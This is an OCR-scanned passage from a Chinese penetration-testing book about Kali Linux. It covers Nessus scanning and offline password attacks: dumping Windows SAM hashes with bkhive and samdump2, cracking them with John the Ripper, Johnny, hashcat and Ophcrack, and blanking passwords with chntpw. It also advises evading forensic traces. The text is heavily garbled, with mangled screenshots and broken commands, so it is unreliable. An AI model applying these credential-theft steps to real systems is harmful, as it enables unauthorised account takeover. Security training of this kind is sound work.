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如 果 想 要 开始 扫描 ， 那 么 点 击 上 方 模 柱 的 Scan 标 签 ， 


选择 New Scan。 它 会 提示 你 输入 日 标 


的 详细 信息 ， 还 会 问 你 想 要 选择 哪个 模板 。Nessus 有 一 些 内 置 模板 。 在 a 我 们 选用 了 外 部 


BHH 


GS 如 果 界 面 上 没有 Scan 标签 , 你 也 可 以 选择 Scan Templatesfe New Scan 来 创建 
新 扫描 。 


© New Scan 


Scan Title CloudCentrics 


Scan Type Run Now 
Scan Policy External Network Scan 


Scan Targets www. cloudcentrics. cor] 


Upload Targets Choose File | No file chosen 


Cancel 


在 选择 Create Sean 后， 扫描 会 在 计划 时 间 局 动 。 上 默认 是 立即 运 


扫描 会 立即 运行 。 


Nessus ， ulnerability scanner 


Templates Policies Users Configuration 


Scan Title Start Time v 


CloudCentrics dmi May 09, 2013 00:04:44 


在 扫描 完成 后 , 结果 可 以 通过 点 击 Results 标 签 查看 。 它 
洞 的 报告 。 


运行 ， 所 以 在 大 多 数 情况 下 ， 


admin Help & Support Sign Out 


会 为 管理 员 提 供 一 份 Nessus 发 现 的 漏 
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ul 
NESSUS vneropiity scanner 


P EE Sey. 
et d 


A Resuts § Seans Templates Policies Users Configuration 


我 们 可 以 检查 完成 的 扫描 ， 以 及 到 目前 为 止 所 有 活动 扫描 收集 的 结果 ， 如 下 图 所 示 : 


Interal web 
sacuri'yblogger.acom 


LXgdLesincs 


作为 渗透 测试 人 员 ， 你 应 该 着重 注音 漏洞。 你 可 以 在 Metasploit 框 染 中 搜索 通过 Microsoft 的 
补丁 或 漏洞 引用 码 找 出 的 漏洞 ， 以 便 能 在 目标 主机 上 利用 这 些 漏 洞 。 有 关 如 何 使 用 Metasploit 的 
更 多 信息 可 参考 第 3 章 的 内 容 。 


Vulnerabdity Summary ee 4 


Ekirar ens S48 ane sre CTpia 


EE ae Dare Soret Cre Med AP 


Li Wet UR ieee Bs Me Gera Fh ten 


Ua pa RRI iactare Bore Dp SEED iu 


LEST: ASA 1 rey coed blow Loos Exsccooe ia 


SE- Security Oped Tm Hie: isons BENI 


Ws Caer Bocas tr era PPT (ET EL 


BEE ee el ee Dee DO) LAS Bele 


Eril Yny lp A ente HET oU P 3 a] xl 


BE CaS Vaie paip eet ot Dogg dw Ramona 


PtH: Hice Eiraan HU FID 


ES. ee ey E ide. Doo GARA que men D 


Uere fupe TUE ULL Sees Eure 


EUB Equo Dhl 


前 面 的 例子 显示 了 一 些 极其 危险 的 漏洞 〈 不 用 担心 ， 我 们 稍 后 会 给 这 些 系 统 打 补 丁 的 ) 所 
有 这 些 漏洞 都 可 以 使 用 Metasploit 或 其 他 攻击 工具 来 加 以 利用 。 要 了 解 如 何 通过 Nessus 找 到 的 漏洞 


at 
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来 进行 漏洞 利用 ， 你 可 以 参考 第 3 章 中 介绍 的 Metasploit。 

Nessus 提 供 了 一 些 导 出 找到 的 漏洞 详细 信息 的 选项 。 你 可 以 将 结 末 导 出 为 HIML CSV. PDF 
和 许多 其 他 稼 见 文 件 类 型 。 要 导出 绪 采 ,你 可 以 先 到 Results 部 分 , 选择 一 个 已 经 完成 的 扫 摘 。 左 
便 的 第 三 个 标签 提供 了 导出 扫描 的 选项 ， 如 下 面 的 截图 所 示 : 


icu 
Wi. Fiter Options 


Export Scan Results 


Expart Farmat HTML 


9 Export Results 


select chapters to include: 


Hasts Summary (Executive) Vulnerabilities Ey Hast Vulnerabilities By Plugin 


45 获取 和 破解 用 户 密码 


根据 定义 , 密码 破解 是 指 从 计算 机 系统 中 存储 或 传送 的 数据 中 还 原 密码 。 密码 是 用 来 加 固 各 
种 类 型 系统 的 安全 ， 我 们 在 第 3 章 中 介绍 攻击 Web 服 务 胡 时 提 到 过 。 


主机 系统 通常 是 Windows 系 统 或 基于 Linux 的 系统 ， 在 存储 和 保护 用 户 密码 方面 有 自己 独特 
的 方式 。 本 节 将 会 着 重 介绍 如 何 破 解 主 机 系统 上 的 密码 文件 。 我 们 之 所 以 在 本 书 中 介绍 这 部 分 内 
R, 是 因为 主机 系统 是 Web 应 用 常见 的 一 种 授权 客户 问 。 侵 和 人 客户 问 也 就 意味 着 开 一 个 门 来 访问 
目标 Web 应 用 。 

获取 用 户 密 码 最 简单 的 方式 是 通过 社会 工程 。 如 前 面 所 介绍 的 那样 , 黑客 可 以 将 目 己 伪 污 成 
已 授权 的 个 体 来 获取 密码 或 是 获取 用 户 创 建 密码 的 线索 。 举 个 例子 , 如 果 知 道 所 有 密码 都 必须 是 
6~10 个 字符 、 必 须 以 大 写字 母 开头 并 以 数字 结尾 这 样 的 规则 , 那么 黑客 破解 密码 所 需要 做 的 尝试 
就 会 大 大 减少 -Kali 提 供 了 一 个 名 为 Crunch 的 工具 来 生成 用 于 这 类 攻击 的 密码 列表 ,极其 简便 。) 

聪明 的 渗透 测试 人 员 应 该 通过 第 2 章 中 介绍 的 侦察 技术 来 找 出 系统 类 型 、 可 能 的 密码 规则 、 
参与 管理 系统 的 人 员 以 及 其 他 能 够 帮助 缩减 破解 密码 范围 的 信息 。 


黑客 破解 密码 一 般 属 是 有 几 种 固定 方式 。 我 们 列 在 了 下 面 。 
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口 猜测 (Guess) 通常 用 收集 到 的 有 关 目 标的 信息 来 进行 人 工 猜 测 。 

O 字典 攻击 (Dictionary attack) 使 用 自动 化 攻击 ， 利 用 字典 中 所 有 可 能 的 单词 进行 尝试 。 
O 暴力 破解 〈Brute-force) 使 用 所 有 可 能 的 字符 组 合 来 试 。 

口 混合 方式 (Hybrid) 混合 使 用 字典 攻击 和 烘 力 破解 。 


密码 必须 存储 起 来 , 这 样 系统 才能 验证 用 户 的 号 份 和 访问 权限 ,但 系统 一 般 不 会 将 密码 以 普 
通 文 本 文件 的 形式 存储 , 原因 显而易见 。 大 多 数 系统 邦 不 会 将 加 密 当 做 保护 密码 的 唯一 方式 ， 
为 还 要 一 个 密 文 来 还 原 ， 这 样 就 会 在 保护 加 密 文 件 上 表现 出 一 定 的 缺点 。 


散 列 化 处 理 (hashing ) 会 将 密 文 或 密码 转换 成 完全 不 同 的 值 (一般 是 用 算术 运算 )。 散 列 化 
处 理 是 不 可 逆 的 , 并 且 会 针对 输入 的 同一 个 密 文 生成 同样 的 敌 列 ， 也 就 是 说 获 列 可 以 被 存储 ,并 
用 于 针对 输入 的 密码 来 进行 号 份 验 证 。 修改 其 中 茶 个 因子 ， 比 如 将 茶 个 字母 大 写 或 是 增加 一 个 空 
格 ， 痢 会 导致 生成 完全 不 同 的 做 列 。 


散 列 也 能 像 密 码 一 样 被 梭 力 破解， 如果 你 知 近 生成 散 列 的 公式 的 话 。 许 多 密码 破解 工具 如 
John the Ripper 都 能 对 散 列 进行 检测 ， 并 用 目 动 生成 的 散 列 输出 来 对 所 有 散 列 的 输出 组 合 进行 
暴力 破解 攻击 。 只 要 找到 了 匹配 的 散 列 ，John the Ripper 就 会 打印 出 生成 匹配 的 散 列 的 普通 文 
AN BRAY, 


#3 Xr. (Rainbow Table ) 是 稼 见 散 列 算法 的 共同 敌人 。 彩 虹 表 是 与 计算 好 的 所 有 散 列 输出 的 
数据 库 ， 可 以 用 来 通过 搜索 来 找 出 散 列 输出 。 Allvww.-freerainbowtables.comp2 75 的 网 站 会 提供 针 
对 流行 的 散 列 算法 的 各 种 版 本 ， 如 在 许多 Windows 系 统 中 使 用 的 MD5。Kali 还 提供 了 如 
RainbowCrack 之 类 的 应 用 来 日 动 生成 彩虹 表 。 


对 散 列 进行 加 盐 处 理会 通过 增加 定制 的 比特 位 来 将 散 列 的 输出 变 成 在 弟 见 彩虹 表 中 无 法 找 
到 的 散 列 。 不 笠 的 是 ， 许 多 系统 如 Windows 并 未 使 用 散 列 加 盐 的 方式 。 


Windows2444 


Windows 是 世界 范围 内 商业 领域 使 用 最 广泛 的 操作 系统 。 在 保护 密码 方面 , WER — ELAS ASE 
详 。 虽 然 现 在 微软 的 产品 已 经 比 早期 版 本 安全 多 了 ， 不过， 它们 仍然 可 以 被 Kali 中 提供 的 很 多 攻 
击 攻陷 。 


Windows 是 将 密码 都 存储 到 系统 账户 管理 ( SAM, System Account Management ) 注册 文件 中 。 
偶 有 例外 ， 会 使 用 活动 目录 ( Active )。 活 动 目录 是 另外 一 种 身份 认证 系统 ， 它 会 将 密码 保存 到 
LDAP 数 据 库 中 。SAM 文 件 位 于 CN< 系 统 根 目录 >\sys32\config 中 。 


SAM 文 件 会 利用 LM 或 NTLM 散 列 将 密码 保存 成 散 列 格式 , 这 样 文件 能 够 更 安全 。 在 Windows 
运行 时 ，SAM 文 件 不 能 被 移动 或 复制 。 但 SAM 文 件 可 以 被 转 存 ， 也 就 是 说 密码 的 那些 散 列 能 够 
被 移动 到 离线 环境 ， 进而 用 暴力 破解 工具 里 破解 。 黑 客 也 可 以 通过 启动 男 外 一 个 操作 系统 、 挂 载 
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Ca:\ 盘 、 在 硬盘 上 或 是 光 张 /软盘 上 启动 Linux 发 行 版 (如 Kali ) 等 方式 来 获取 SAM 文 件 。 


有 个 常见 的 能 找到 SAM 文 件 的 位 置 是 C:\< 系 统 根 目录 >\repair 日 录 。 默 认 系 统 会 创建 备份 用 
的 那 份 SAM 文 件 , 并 且 通 凋 不 会 被 系统 管理 员 删 除 。 这 个 备份 文件 并 没有 受到 任何 保护 , 不 过 是 
经 过 压缩 处 理 的 ; 也 就 是 说 ， 必须 完 解压 文件 才 E 获 取 散 列 文件 。 你 可 以 用 expand 工 具 来 解压 文 
ft. 命令 格 式 是 expand [文件 名 ] [目标 位 置 |。 这 里 有 个 将 这 个 压缩 的 SAM 文 件 展开 成 解压 后 的 
SAM 文 件 的 例子 : 


C:\> expand SAM uncompressedSAM 


为 了 应 对 离线 破解 的 威胁 , 微软 的 Windows 2000 系 统 和 更 新 的 系统 添加 了 一 个 SYSsKEY 工 具 。 
SYSKEY 工 具 会 将 SAM 文 件 中 散 列 化 处 理 的 密码 用 128 位 的 加 密 密 钥 来 加 密 , 每 个 不 同 的 安装 中 这 
个 密 钥 也 不 同 。 


能 够 物理 访问 Windows 系 统 的 攻击 者 可 以 通过 以 下 途径 获得 SYSKEY (也 称 为 局 动 密 钥 ): 


(1) 局 动 为 一 个 操作 系统 ( 比如 Kali ); 

(2) Bi3ESAMAISYSTEMOCTTR]AE SE ( C:\sys32\config ); 
(3) 通过 bkreg 和 bkhive 从 SYSTEM 目 录 恢 复 启 动 密 铀 ; 
(4) 转 存 那 些 密码 的 散 列 ; 

(5) 用 如 John the Ripper 一 类 的 工具 离线 破解 。 


/ 如 果 访 问 了 Windows 中 的 文件 ， 你 会 修改 MAC ( Modify/Access/Create, 14 
改 / 访 heal / 创 RU ) 信息 NSO Windows 用 这 些 信 息 来 记录 你 的 JE X. 为 了 避免 8 ES 
取证 的 证 据 ， 我 们 建议 你 先 复制 目标 主机 系统 ， 然 后 再 发 起 攻击 。 


1. 挂 载 Windows 


有 很 多 工具 可 以 用 来 获取 Windows 中 的 SAM 和 SYSKEY 文 件 。 提取 这 些 文件 的 一 个 方式 是 挂 
载 目 标 系统 的 Windows 系 统 ， 这 样 其 他 工具 就 可 以 访问 这 些 文件 ， 而 Windows 却 没 在 运行 。 


第 一 步 是 使 用 fqisk -1 命令 来 找 出 系统 中 的 分 区 。 你 必须 找 出 Windows 和 分 区 类 型 。fqisk 
输出 会 显示 一 个 NTFS 分 区 ， 如 下 所 示 : 


Device Boot Start End Blocks Id System 
/dev/hdb1* 1 2432 19535008+ 86 NTFS 

/dev/hdb2 2433 2554 979965 82 Linux swap/Solaris 
/dev/hdb3 2555 6202 29302560 83 Linux 


你 可 以 用 命令 mkdir /mnt/windows 来 创建 一 个 挂 载 点 。 


CD 此 处 作者 原文 为 “modify, access and change”, 但 这 个 解释 是 \*nix 系 列 系 统 的 解释 。Windows 上 一 般 会 将 MAC 理 解 
J “modify, access and create”. — 一 译 者 注 


4.6 Kali 'P 45 25 yak E T. EL 125 


然后 用 下 面 例子 中 的 命令 来 挂 载 Windows 系 统 : 
mount -t <Windows##!> <Windows 分 区 > /mnt/windows 


-~# mkdir /mnt/windows 


Mie mount -t ntfs-3g /dev/hdbl/mnt/windows 


现在 目标 的 Windows 系 统 已 经 成 功 挂 载 , 你 可 以 将 SAM 文 件 和 SYSTEM 文 件 用 下 面 的 命令 复 
制 到 攻击 目录 中 : 


cp SAM SYSTEM /pentest/passwords/AttackDirectory 


还 有 一 些 工具 可 以 用 来 转 存 SAM 文 件 。PwDump 和 Cain and Abel 只 是 其 中 的 两 个 。Kali 还 提 
供 了 samdqump 工 具 ， 在 4.6.3 刷 中 我 们 会 再 做 介绍 。 


你 需要 恢复 Bootkey 和 SAM 文 件 。Bootkey 文 件 是 用 来 访问 SAM 文 件 的 。 用 
来 访问 SAM 文 件 的 工具 要 用 到 Bootkey 文 件 。 


bkreg 和 bkhive 是 用 来 获取 Bootkey 文 件 的 常见 工具 ， 如 下 面 的 截图 所 示 。 


E bKhive /win/WINDOWS/systems2/contig/system key.txt 
bkhive 1.1.1 by Objectif Securite 


http://www.objectif-securite.ch 


original author: ncuomodstudenti.unina.it 


Root Key : $5: 
Default Controlset: 002 


2. Linux 密 人 码 

Linux 主 机 系统 并 不 像 Windows 一 样 常 见 , 获取 ROOT 访 问 权 限 面 临 的 难度 也 有 所 不 同 。 如 果 
启用 了 上 自动 登录 , 许多 系统 可 能 会 将 密码 以 明文 的 形式 存储 ， 比 如 用 于 Telnet 和 FTP 的 .netrc 文 件 。 
对 于 多 数 攻 击 ， 你 需要 提取 passwd 和 shadow 文 件 。 它 们 通常 位 于 /etc/passwd 和 /etc/shadow。 


shadow 文 件 只 有 ROOT 用 户 可 读 ,， 通常 以 MD5 散 列 的 方式 储存 。shadow 文 件 要 比 Windows 的 
SAM 文 件 更 难 获取 。 一 般 获 取 shadow 文 件 都 是 通过 引导 加 载 程序 ， 如 grub。 


破解 Linux 的 密码 跟 破 解 其 他 系统 如 Windows 的 密码 基本 类 似 。 许 多 混合 型 上 月 动 破 解 程 序 ， 
如 John the Ripper， 可 以 识别 散 列 的 类 型 ， 并 用 正确 的 字典 暴力 破解 shadow 文 件 中 的 密码 。 


4.6 Kali 中 的 密码 破解 工具 


Kali 提 供 了 各 种 各 样 的 工具 来 绕 过 密码 安全 。 密码 破解 工具 可 以 在 Password Attacks PEREI, 
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具体 分 为 离线 破解 工具 和 在 线 破 解 工具 两 大 类 。 本 市 将 会 着 重 介 绍 在 Web 应 用 渗透 测试 中 危害 主 
机 系统 的 工具 。Kali 中 也 有 其 他 一 些 工 具 ， 比 如 用 来 破解 无 线 协 议 密 码 的 工具 ， 不 过 ， 本 书 不 会 


| John the Ripper 命 令 行 和 Hydra 工 具 在 第 3 章 中 已 经 做 过 介绍 。 | 


4.6.1 Johnny 


Johnny 是 流行 的 John the Ripper 密 码 破 解 工 具 的 一 个 图 形 化 界面 ,我 们 在 第 3 章 中 介绍 了 传统 
的 John the Ripper 命 令 行 版 本 。 跟 命令 行 版 本 类 似 ，Johnny 有 若干 个 引擎， 这 样 它 就 能 破解 不 同 
类 型 的 密码 , 包括 加 密 过 的 密码 和 散 列 化 处 理 过 的 密码 。Johnny 能 够 自动 检测 大 多 数 散 列 化 的 密 
码 和 加 密 过 的 密码 ,这 点 使 得 这 个 过 程 对 渗透 测试 人 员 来 说 更 简单 。 攻 击 者 都 喜欢 这 个 工具 ， 
为 它 的 可 定制 性 非常 强 ， 能 以 各 种 方式 定制 ， 以 便 加 快 破解 密码 的 速度 。 


有 些 定制 可 能 在 Johnny 中 不 可 用 。 对 于 大 多 数 攻 击 ， 我们 推荐 使 用 它 的 命令 
行 版 本 ，John the Ripper。 


John the Ripper 按 如 下 方式 工作 : 


a 答 试 用 攻击 字典 来 破解 密码 ; 

a 答 试 在 字典 单词 的 前 面 或 后 面 加 上 字母 数字 字符 来 破解 ; 
Q 将 字典 单词 放 在 一 起 进行 攻击 ; 

口 将 字母 数字 字符 放 到 一 起 组 成 新 的 单词 ; 

Q 在 字典 单词 中 混入 特殊 字符 来 进行 攻击 ; 

a 当 所 有 其 他 方法 都 失败 了 ， 答 试 又 力 人 破解 。 


要 使 用 Johnny, 你 可 以 浏览 Password Attacks > Offline Attacks, 然后 选择 Johnny。 点 击 Open 
Password File， 选 择 你 要 破解 的 密码 文件 。 下 面 的 截图 显示 了 将 这 有 用 户 BOB、mary 和 joey 的 
shadow 文 件 作 为 目标 的 场景 。 


随 着 Johnny 开 始 人 破解 密码 ，Password 列 会 被 未 淘 填 满 。 


Passwords 


Options 


sil 
Statistics 


Settings 


4.6 Kali P $5 2 b sk fj T. .R- 


User Password 
19 | syslog 


20 sshd 


21 landscape 


22 | messagebus 


| 


23 nobody 


24 mysql 


25 avahi 


15742:0:99999:7::: 
15742:0:99999:7::: 
15742:0:99999:7::: 
15742:0:99999:7::: 
15742:0:99999:7::: 
15742:0:99999:7::: 
15742:0:99999:7::: 
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26 | snort 15742:0:99999:7::: 


ae — 


Output 27 | statd 15742:0:99999:7::: 


28 usbmux 15742:0:99999:7::: 


29 pulse 15742:0:99999:7::: 
30 rtkit 15742:0:99999:7::: 


31 festival 15742:0:99999:7::: 
15742:0:99999:7::: 


S6SNihLh90O... | 1577:230:99999:7::: 


$6$6mNj7T... | 15771:):99999:7::: 


$6$uqEpDb... 1577340:99999:7::: 


左 侧面 板 上 有 Johnny 的 配置 标签 。Options 标 签 是 你 选择 攻击 类 型 的 地 方 。 下 面 的 截图 显示 
了 默认 行为 的 定义 和 选择 散 列 类 型 的 选项 。Johnny 的 上 自动 检 测 通 常 能 有 90% 的 正确 率 。 


General options 
Passwords | Format: Auto detect 
2s Mode selection and settings des 
Options O Default behaviour OSG 


E d O "Single crack" mode 
ul 


Statistics «Biz Wordlist mode 
X © "Incremental" mode 


() External mode 
Settings 


Default behaviour | "Single crack" mode Wordlist mode 


Output With default behaviour John the Ripper will run "single crack" mode, then wordlist mode, then "incremental" mode. All with default settings. 


Statistics 标 签 会 显示 Johnny 已 经 运行 某 个 活动 会 话 多 长 时 间 了 。Settings 标 签 则 会 指定 Johnny 
以 何 种 方式 运行 ， 如 下 图 所 示 。 
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默认 的 John the Ripper 的 路 径 设置 不 一 定 正确 。 为 了 保险 起 见 ， 你 最 好 验证 一 
下 Settings 中 的 John the Ripper 路 径 。 在 早期 的 BackTrack 版 本 中 , 我 们 发 现 必须 手动 
将 此 路 径 改 为 /pentest/passwords/john/john。Kali 1.0 上 默认 的 路 径 是 /user/sbin/john。 


2 


Passwords 


Reset Settings back to saved state 
Fill Settings with default values 


: Path to John the Ripper executable: ||pentest;passwords/johnjonn | | | Browse 
NE Time interval in seconds between cracked passwords picking — °° ff 
sli d (edit john.conf respectively): = 
Statistics | 口 Apply Settings as soon as they are changed Apply Settings but do NOT SAVE them 
| Apply and Save Settings 


Settings 


Output 标 签 显 示 的 是 Johnny 正 在 攻击 的 目标 .在 这 里 你 还 能 看 到 攻击 会 话 中 的 错误 消息 和 状 
态 更 新 。 下 面 的 例子 显示 的 是 一 条 状态 消息 ， 表 明 Johnny 正 在 识别 密码 的 散 列 类 型 。 


Warning: detected hash type "shaS512crypt", but the string is also recognized as "crypt" 
Use the "--formatzcrypt" option to force loading these as that type instead 
uch file or directory 


John the Ripper 和 它 的 GUI 前 端 一 一 Johnny 一 一 的 默认 单词 列表 非常 有 限 , 我 们 推荐 用 更 大 的 
列表 , 你 可 以 在 线 搜索 找到 ,要 使 用 定制 的 单词 列表 , 跳 到 Options 标 签 , 然后 选择 Wordlist mode. 
浏览 到 你 期 望 的 定制 单词 列表 ， 点 击 Apply。 


Q General options 


Passwords | Format: | Auto detect v 
e Mode selection and settings 
Options O Default behaviour 


- d O "Single crack" mode 
ul 


Statistics | 9 Wordlist mode 
X | () "Incremental" mode 
m © External mode 


Default behaviour "Single crack" mode | Wordlist mode "Incremental" mode External mode 


Output Wordlist mode uses data from wordlist file. As an addition rules could be applied. Section "Wordlist" would be used to mangle words with 
rules. 


Wordlist file: /root/Desktop/wordlist.Ist v Browse 
D 


O Use external mode, filter name: | y 


Settings 
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BEE CE EAS EFT , Johnny eee AIRRA PARERS 
个 密码 中 的 两 个 已 经 被 破解 了 。 


| test | $6$NihLh9Ov$peHqQGU...|15771:0:99999:7::: 


| $656mNj7TNd$tYkHI3k... | 15771:0:99999:7::: 
S6S5uqEpDbnES/ge4|VGa... | 15772:0:99999:7::: 


75% (3/4: 3 cracked, 1 left) [] 


46.2 hashcat#loclHashcat 


hashcat 


advanced 


password 
recovery 


hashcat 和 oclHashcat 是 密码 破解 工具 。oclHashcat 是 基于 GPGPU 的 版 本 。hashcat/oclHashcat 
工具 都 是 多 线程 工具 。 它 们 可 以 在 单个 攻击 会 话 中 并 行 处 理 多 个 散 列 和 密 公 列表 。 
hashcat/oclHashcat 工 具 提 供 了 多 个 攻击 选项 ， 比 如 又 力 破解 、 密 人 码 合 成 、 字 典 、 混 合 、 掩 码 和 基 
于 规则 的 攻击 。 


BackTrack 在 Privilege Escalation > Password Attacks > Offline Attacks 下 面 提 供 了 多 个 版 
本 的 hashcat。“ocl”， 或 者 叫 “open cl”( 开源 cl )， 是 指 统一 Nvidia 和 ATI 的 GPU 了 驱动 的 开放 实 
现 。 有 些 版 本 在 更 新 BackTrack 后 束 无 法 工作 了 ， 所 以 你 可 能 需要 从 wwwhashcat.nel 下 载 安装 
最 新 的 版 本 。 


要 使 用 hashcat， 打 开 hashcat 应 用 ， 或 是 浏览 Password Attacks > Offline Attacks > hashcat 
Bl nf, 


要 针对 某 个 文档 运行 hashcat， 你 可 以 输入 hashcat [选项 ] 散 列 文件 名 [单词 文件 | 目录 ]。 下 
面 的 例子 演示 了 hashcat 在 针对 shadow 文 件 运 行 单 词 列 表 中 的 单词 : 


‘=# hashcat / 


Initializing hashcat v@.44 by atom with 8 threads and 32mb segment-size... 


hashcat 还 会 提供 给 一 个 GUI, 它 可 以 用 作 命 令 行 版 本 的 前 端 , 有 些 人 会 偏好 使 用 图 形 化 界面 ， 
为 使 用 起 来 方便 ， 在 下 方 的 窗口 还 能 显示 命令 行 代码 。 


hashcat oclHashcat-plus oclHashcat-lite 


Hash file or hash: D:/tools/hashcat-qui-0.5.0/oclHashcat-plus/example500, hash 


4| Remove hash From hash list once it is cracked Ignore username in hashfile 
Word lists 


v DAtools\hashcat-gui-0.5.0\oclHashcat-plus\example.dict 
| Add files... 
| Add folder... 


Remove 


Mode: | Straight Hash type: |MD5 


Rules Assume charset is given in hex 


© Use rules files: Assume salt is given in hex 
Mask 


4| Rules File: :-plus/rules/best64.rule Open... 


Rules file: Open... 

Rules File: Open... Custom charsets 

Generate rules: Charset 1: 
Password length harset a: 


charset 3: 


ength: |i -harset 4: 


Resources Output 
CPU affinity: 

GPU devices: 

GPU workload tuning: 


ashcat-plus/example500.hash.out | Open... | 
GPU loops: —À 


Format: | hash[:salt]:plain hd | 


GPU watchdog: 


Segment size: 32 MB 


Start oclHashcat-plus64.exe --remove --rules-file D:/tools/hashcat-qui-0.5,0/oclHashcat-plus/rules/beste 


4.6.3 samdump2 


samdump2 是 一 个 用 来 转 存 微软 的 Windows 中 密码 散 列 的 SAAM 文 件 的 工具 ， 这样 密 人 码 就 可 以 
用 离线 工具 进行 破解 。 对 于 较 新 版 本 的 Windows， 你 可 能 需要 借助 其 他 工具 来 抓 取 SYSKEY COH 
动 密 文 ) 文件 ， 进 而 访问 存在 SAM 数 据 库 中 的 散 列 。 


samdump2 位 于 Password Attacks > Offline Attacks > samdump2。 当 你 启动 samdump 时 ， 它 
会 弹出 一 个 终端 窗口 。 


samdump2 1.1.1 by Objectif Securite 
http://www.objectif-securite.ch 
Original author: ncuomo@studenti.unina.it 


Usage: 
Samdump2 samhive keyfile 
:~# | 


你 必须 先 挂 载 目标 Windows 系 统 ， 这 样 samdqump 才 能 访问 SAM 文 件 。 


‘—# mkdir /mnt/windows 


-~# mount -t ntfs-3g /dev/hdb1/mnt /windowsli 
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下 一 步 ， 将 SAM 文 件 和 SYSKEY 文 件 复制 到 你 的 攻击 目录 中 。 
cp SAM SYSTEM /root/AttackDirectory 


切换 到 攻击 目录 ， 调 用 bkhive SYSTEM bootkev 命 令 来 获得 启动 密 文 。 将 启动 密 文 复制 到 
一 个 文本 文件 中 ， 这 样 samdump 就 拿 到 辽 有 启动 密 文 的 SAM 文 件 。 


cd /root/AttackDirectory/* > windowshashfiles .txt 


运行 命令 samdump SAM bootkey 命 令 ， 将 输出 复制 到 男 一 个 文本 文件 中 。 
Samdump2 SAM bootkey > windowshashfiles2.txt 


现在 你 可 以 用 密码 破解 工具 如 John the Ripper 来 破解 这 些 散 列 了 。 


4.6.4 chntpw 


chntpw 是 Kali Linux 、BackTrack 和 其 他 Linux 发 行 版 中 市 有 的 一 个 工具 。 可 以 用 它 重 置 
Windows 8 或 早期 Windows 版 本 中 的 本 地 密码 , 也 可 以 用 它 修 改 Windows 的 密码 数据 库 。 不 过 , E 
要 是 用 于 在 不 知道 密码 的 情况 下 侵 和 人 Windows 系 统 。 


要 使 用 chntpw, 需要 用 Kali Live CDi Windowst Lat. PRAT LA http://www.kali.org/downloads/ 
下 载 Kali Linux 的 ISO 映 像 文件 。 


将 ISO 文件 烧 录 至 CD 中 ,用 此 Live CD 启动 Windows 机 器 ,在 Kali 的 启动 菜单 上 ,选择 Forensics 
选项 。 


MENGE CLUB UU 


Hoot menu 


Graphical install 
Install with speech synthesis 


Press ENTER to boot or TAB to edit a menu entry 
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SAM 文 件 通 常 位 于 /Windows/System32/config 目 录 中 。 你 需要 在 终端 中 切换 到 此 目录 。 在 你 
的 系统 上 ， 情 况 可 能 是 这 样 的 : 


/media/hdal1/Windows/System32/config 


每 个 系统 都 有 轻微 的 区 别 。 在 这 个 例子 中 ，Kali 看 起 来 是 将 我 的 硬盘 的 序列 号 用 作 了 设备 位 
置地 址 。 这 是 因为 我 已 经 用 Kali Live CD 启动 了 一 个 Windows 7 虚拟 机 。S4AM 数 据 库 通常 位 于 
/media/4#& 3 £ #&/Windows/System32/config. 


下 面 的 截图 列 出 了 我 的 硬盘 上 的 SAM 数 据 库 文 件 : 


T: 
ot 
"oot 
t 

t 


命令 chntpw -1 SAM 会 列 出 Windows 系 统 中 含有 的 所 有 用 户 名 。 下 面 的 截图 显示 的 是 运行 
了 chntpw -1 SAM 命 令 的 输出 结 


* SAM pol 

Failed logir 

Minimum passwor' 

Passwor 

| | d lsername Admin: 
Administrator ADMIN 
alakhani ADMIN 
Guest 
| HomeG roupUsers 


= 


Iser Edit Menu: 


Clear (blank) user password 

- Edit (set new) user password | 
Promote user (r : 

- Unlock and enable user account) 
Quit editing user, 
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我 们 还 可 以 选择 清除 密码 、 修 改 密码 或 是 将 用 户 提升 为 管理 员 。 但 是 在 Windows 7 上 ， 修 改 
密码 并 非 总 能 起 作用 ， 所 以 我 们 建议 使 用 清除 密码 。 这 么 操作 的 话 , 你 可 以 用 一 个 空 密码 登录 到 
目标 系统 。 


要 访问 chntpw, N| "Password Attacks > Offline Attacks > chntpw。 它 会 打开 一 个 终端 窗口 ， 
显示 chntpw 的 欢迎 界面 。chntpw 有 符 干 种 用 法 ， 如 主 局 动 界 面 所 描述 : 


[c] Petter N Hagen 


GAH file 


UEFA RETO. 


a "t fg TT T” = i 
p Tu usare "STET IL 


rre pL 
Interactive, 


= mom Am = Li b je 
H z J15 LI Hj agl LERF i le m 


要 使 用 交互 模式 ， 输 入 chntpw -1 和 SAM 文 件 的 路 径 。 如 果 目 标 是 一 个 挂 载 的 系统 ， 你 需 
要 指定 SAM 文 件 在 挂 载 目 录 中 的 位 置 。 


它 会 弹出 一 个 沫 单 ， 提 供奉 干 种 修改 SAM 文 件 的 选项 。 


Oxoall = 
| | Homedir reg. 
Naraal account 


Account DITS: 
ix] Caisabled | 
| ] Tap, duplicate Fi 
| |] osain trust ac | |] Wes trust act. 
[x] Ped don't expir | | ] Auto lockout 

| ] (unknown 6x16) | ) (unknown Gx 20) 
le max tries is: O 


whi | 


Failed login 
Total login 


count: G, 
count: 25 


你 可 以 选择 选项 1 来 清除 密码 。 


| Passwd not req. 
| | AAS account | 
| Srv trust act 
| {unkno Gx Ge) 
| (unknown Ox4G) 


. User 


Clear (b 


Edit Menu 


lank) user pas So Md 


2 - Edit (set new) user password (careful with this on XP 
3 - Promote user (make user an administrator) 


"| 
fe as " 
- E NI a -| 


4.6.5 Ophcrack 


Ophecrack 是 一 个 机 遇 彩 虹 表 的 Windows 密 人 码 破 解 锅 。Kali 提 供 了 一 个 命令 行 版 本 和 一 个 图 形 
化 界面 版 本 。 Ophcrack 可 以 从 多 种 格式 中 导入 散 列 , 包括 直接 从 Windows 的 SAM 文 件 中 直接 转 存 。 
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下 面 的 截图 显示 的 是 可 以 加 载 到 Ophcrack 中 的 几 种 格式 : 


= 


Delete Help Exit 


NTHash | LMPwdl | LM Pwd2 


Directory 


Preload: waiting | Brute force: | waiting | Pwd found: 0/0 | Time elapsed: Oh Om Os | 


Ophcrack A F T HHR, 如 下 面 的 例子 中 所 示 。 我 们 建议 加 载 最 新 的 彩虹 表 , 而 不 是 用 默认 的 。 
彩虹 表 可 以 从 在 线 资源 中 下 载 ， 比 如 开发 者 网 站 http:/ophcrack.sourceforge.net/tables.php。 


Table Selection 


Table 
@ XP free fast 


e XP special 

@ XP german v1 
@ XP german v2 
@ Vista special 
@ Vista free 

@ Vista nine 

@ Vista eight 

@ Vista num 

@ Vista seven 
e XP flash 

@ Vista eight XL 


e XP free small | 


not installe 
not installe 
not installe 
not installe 
not installe 
not installe 
not installe 
not installe 
not installe 
not installe 
not installe 
not installe 
not installe 


@ = enabled ə = disabled @ = not installed 


| a | |v |[ @ jie Install OK 


